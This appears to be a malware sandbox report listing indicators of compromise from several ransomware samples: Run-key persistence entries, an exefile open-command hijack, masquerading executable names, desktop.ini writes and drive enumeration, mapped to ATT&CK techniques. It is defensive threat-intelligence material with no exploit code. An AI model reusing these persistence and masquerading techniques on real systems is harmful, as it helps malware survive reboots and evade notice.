Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\SysWow64\\drivers\\spools.exe \"%1\" %*"	Trojan-Ransom.Win32.Blocker.itys-752faacdb6a477e6b45de1b6e1f2e756dd9a2f3d1a8d6294c11a1c46dd98f611.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\SysWow64\\drivers\\spools.exe \"%1\" %*"	spools.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\SysWow64\\drivers\\spools.exe \"%1\" %*"	spools.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 32 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\autoload = "C:\\Users\\Admin\\cftmon.exe"	spools.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ntuser = "C:\\Windows\\system32\\drivers\\spools.exe"	spools.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\autoload = "C:\\Users\\Admin\\cftmon.exe"	spools.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\autoload = "C:\\Users\\Admin\\cftmon.exe"	spools.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ntuser = "C:\\Windows\\system32\\drivers\\spools.exe"	spools.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\autoload = "C:\\Users\\Admin\\cftmon.exe"	spools.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\YandexBrowserAutoLaunch_45886AE68CD319C7351FF54A1DBD4B87 = "\"C:\\Users\\Admin\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\browser.exe\" --shutdown-if-not-closed-by-system-restart"	browser.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\FIX2-hnfpgt = "C:\\Windows\\SYSTEM32\\CMD.EXE /C START \"\" \"C:\\Users\\Admin\\AppData\\Roaming\\wsmprovhost.exe\""	wsmprovhost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\autoload = "C:\\Users\\Admin\\cftmon.exe"	spools.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\cojuuwfdypb = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\sbujpy.exe\""	Trojan-Ransom.Win32.GandCrypt.jdv-bfe57e23766e9709df6e275a6f4eb3dd841882c8b155398911491a99dde77732.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ntuser = "C:\\Windows\\system32\\drivers\\spools.exe"	spools.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\autoload = "C:\\Users\\Admin\\cftmon.exe"	Trojan-Ransom.Win32.Blocker.itys-752faacdb6a477e6b45de1b6e1f2e756dd9a2f3d1a8d6294c11a1c46dd98f611.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Office\\rundll32.exe"	Trojan-Ransom.Win32.PornoAsset.dggw-f0c7d7525fdd13a49730e5cef8d6ea3d95361dbd439082c2c0701139460fa708.exe#$.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ntuser = "C:\\Windows\\system32\\drivers\\spools.exe"	spools.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\autoload = "C:\\Users\\Admin\\cftmon.exe"	Trojan-Ransom.Win32.Blocker.itys-752faacdb6a477e6b45de1b6e1f2e756dd9a2f3d1a8d6294c11a1c46dd98f611.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ntuser = "C:\\Windows\\system32\\drivers\\spools.exe"	spools.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ntuser = "C:\\Windows\\system32\\drivers\\spools.exe"	spools.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\autoload = "C:\\Users\\Admin\\cftmon.exe"	spools.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\IMJPMIG9.10 = "C:\\WINDOWS\\system32\\svch0st.exe"	Trojan-Ransom.Win32.PornoAsset.dggw-f0c7d7525fdd13a49730e5cef8d6ea3d95361dbd439082c2c0701139460fa708.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe = "C:\\Windows\\System32\\Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe"	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ntuser = "C:\\Windows\\system32\\drivers\\spools.exe"	spools.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ntuser = "C:\\Windows\\system32\\drivers\\spools.exe"	spools.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ntuser = "C:\\Windows\\system32\\drivers\\spools.exe"	Trojan-Ransom.Win32.Blocker.itys-752faacdb6a477e6b45de1b6e1f2e756dd9a2f3d1a8d6294c11a1c46dd98f611.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\autoload = "C:\\Users\\Admin\\cftmon.exe"	spools.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\autoload = "C:\\Users\\Admin\\cftmon.exe"	spools.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ntuser = "C:\\Windows\\system32\\drivers\\spools.exe"	spools.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Client Server Runtime Subsystem = "\"C:\\ProgramData\\Windows\\csrss.exe\""	HEUR-Trojan-Ransom.Win32.Shade.gen-b89ae460c4a36180e3fe0e578e5f36354c438ae36324beaeef889ff69425653b.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ntuser = "C:\\Windows\\system32\\drivers\\spools.exe"	spools.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\IMJPMIG9.10 = "C:\\WINDOWS\\system32\\svch0st.exe"	Trojan-Ransom.Win32.PornoAsset.dggw-f0c7d7525fdd13a49730e5cef8d6ea3d95361dbd439082c2c0701139460fa708.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\autoload = "C:\\Users\\Admin\\cftmon.exe"	spools.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\autoload = "C:\\Users\\Admin\\cftmon.exe"	spools.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ntuser = "C:\\Windows\\system32\\drivers\\spools.exe"	Trojan-Ransom.Win32.Blocker.itys-752faacdb6a477e6b45de1b6e1f2e756dd9a2f3d1a8d6294c11a1c46dd98f611.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops desktop.ini file(s) 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Users\Public\desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Users\Public\AccountPictures\desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	F:\$RECYCLE.BIN\S-1-5-21-2437139445-1151884604-3026847218-1000\desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn1\desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Users\Admin\3D Objects\desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\N:	Trojan-Ransom.Win32.Blocker.itys-752faacdb6a477e6b45de1b6e1f2e756dd9a2f3d1a8d6294c11a1c46dd98f611.exe
File opened (read-only)	\??\X:	Trojan-Ransom.Win32.Gen.sgx-dafe53c9fb860e78aae45c8ab3dcc5da6c07ecbac0f62f5f02161a498ab759df.exe
File opened (read-only)	\??\N:	Trojan-Ransom.Win32.Sodin.aas-ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened (read-only)	\??\H:	HEUR-Trojan-Ransom.Win32.PolyRansom.gen-681b516d2b438bec4075d00701007c8cf49981d864bef9a0f81dadf3b78599bc.exe
File opened (read-only)	\??\X:	HEUR-Trojan-Ransom.Win32.PolyRansom.gen-681b516d2b438bec4075d00701007c8cf49981d864bef9a0f81dadf3b78599bc.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\I:	spools.exe
File opened (read-only)	\??\T:	HEUR-Trojan-Ransom.Win32.PolyRansom.gen-681b516d2b438bec4075d00701007c8cf49981d864bef9a0f81dadf3b78599bc.exe
File opened (read-only)	\??\M:	Trojan-Ransom.Win32.GandCrypt.jdv-bfe57e23766e9709df6e275a6f4eb3dd841882c8b155398911491a99dde77732.exe
File opened (read-only)	\??\M:	Trojan-Ransom.Win32.Gen.sgx-dafe53c9fb860e78aae45c8ab3dcc5da6c07ecbac0f62f5f02161a498ab759df.exe
File opened (read-only)	\??\A:	Trojan-Ransom.Win32.GandCrypt.jdv-bfe57e23766e9709df6e275a6f4eb3dd841882c8b155398911491a99dde77732.exe
File opened (read-only)	\??\O:	spools.exe
File opened (read-only)	\??\E:	spools.exe
File opened (read-only)	\??\V:	HEUR-Trojan-Ransom.Win32.PolyRansom.gen-681b516d2b438bec4075d00701007c8cf49981d864bef9a0f81dadf3b78599bc.exe
File opened (read-only)	\??\W:	HEUR-Trojan-Ransom.Win32.PolyRansom.gen-681b516d2b438bec4075d00701007c8cf49981d864bef9a0f81dadf3b78599bc.exe
File opened (read-only)	\??\O:	spools.exe
File opened (read-only)	\??\H:	rundll32.exe
File opened (read-only)	\??\M:	spools.exe
File opened (read-only)	\??\J:	Trojan-Ransom.Win32.Sodin.aas-ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened (read-only)	\??\E:	HEUR-Trojan-Ransom.Win32.PolyRansom.gen-681b516d2b438bec4075d00701007c8cf49981d864bef9a0f81dadf3b78599bc.exe
File opened (read-only)	\??\I:	spools.exe
File opened (read-only)	\??\L:	spools.exe
File opened (read-only)	\??\R:	Trojan-Ransom.Win32.Sodin.aas-ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened (read-only)	\??\U:	Trojan-Ransom.Win32.Sodin.aas-ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\I:	Trojan-Ransom.Win32.GandCrypt.jdv-bfe57e23766e9709df6e275a6f4eb3dd841882c8b155398911491a99dde77732.exe
File opened (read-only)	\??\T:	Trojan-Ransom.Win32.GandCrypt.jdv-bfe57e23766e9709df6e275a6f4eb3dd841882c8b155398911491a99dde77732.exe
File opened (read-only)	\??\L:	rundll32.exe
File opened (read-only)	\??\X:	rundll32.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\L:	spools.exe
File opened (read-only)	\??\Q:	spools.exe
File opened (read-only)	\??\G:	spools.exe
File opened (read-only)	\??\P:	HEUR-Trojan-Ransom.Win32.PolyRansom.gen-681b516d2b438bec4075d00701007c8cf49981d864bef9a0f81dadf3b78599bc.exe
File opened (read-only)	\??\V:	Trojan-Ransom.Win32.GandCrypt.jdv-bfe57e23766e9709df6e275a6f4eb3dd841882c8b155398911491a99dde77732.exe
File opened (read-only)	\??\M:	spools.exe
File opened (read-only)	\??\R:	Trojan-Ransom.Win32.Gen.sgx-dafe53c9fb860e78aae45c8ab3dcc5da6c07ecbac0f62f5f02161a498ab759df.exe
File opened (read-only)	\??\G:	Trojan-Ransom.Win32.Sodin.aas-ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened (read-only)	\??\E:	Trojan-Ransom.Win32.Blocker.itys-752faacdb6a477e6b45de1b6e1f2e756dd9a2f3d1a8d6294c11a1c46dd98f611.exe
File opened (read-only)	\??\G:	Trojan-Ransom.Win32.Blocker.itys-752faacdb6a477e6b45de1b6e1f2e756dd9a2f3d1a8d6294c11a1c46dd98f611.exe
File opened (read-only)	\??\Q:	spools.exe
File opened (read-only)	\??\V:	rundll32.exe
File opened (read-only)	\??\L:	Trojan-Ransom.Win32.Gen.sgx-dafe53c9fb860e78aae45c8ab3dcc5da6c07ecbac0f62f5f02161a498ab759df.exe
File opened (read-only)	\??\Q:	Trojan-Ransom.Win32.GandCrypt.jdv-bfe57e23766e9709df6e275a6f4eb3dd841882c8b155398911491a99dde77732.exe
File opened (read-only)	\??\G:	spools.exe
File opened (read-only)	\??\J:	rundll32.exe
File opened (read-only)	\??\G:	Trojan-Ransom.Win32.Gen.sgx-dafe53c9fb860e78aae45c8ab3dcc5da6c07ecbac0f62f5f02161a498ab759df.exe
File opened (read-only)	\??\O:	Trojan-Ransom.Win32.Gen.sgx-dafe53c9fb860e78aae45c8ab3dcc5da6c07ecbac0f62f5f02161a498ab759df.exe
File opened (read-only)	\??\S:	HEUR-Trojan-Ransom.Win32.PolyRansom.gen-681b516d2b438bec4075d00701007c8cf49981d864bef9a0f81dadf3b78599bc.exe
File opened (read-only)	\??\N:	spools.exe
File opened (read-only)	\??\N:	Trojan-Ransom.Win32.GandCrypt.jdv-bfe57e23766e9709df6e275a6f4eb3dd841882c8b155398911491a99dde77732.exe
File opened (read-only)	\??\O:	Trojan-Ransom.Win32.GandCrypt.jdv-bfe57e23766e9709df6e275a6f4eb3dd841882c8b155398911491a99dde77732.exe
File opened (read-only)	\??\O:	spools.exe
File opened (read-only)	\??\K:	Trojan-Ransom.Win32.Sodin.aas-ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened (read-only)	\??\Y:	HEUR-Trojan-Ransom.Win32.PolyRansom.gen-681b516d2b438bec4075d00701007c8cf49981d864bef9a0f81dadf3b78599bc.exe
File opened (read-only)	\??\G:	msiexec.exe
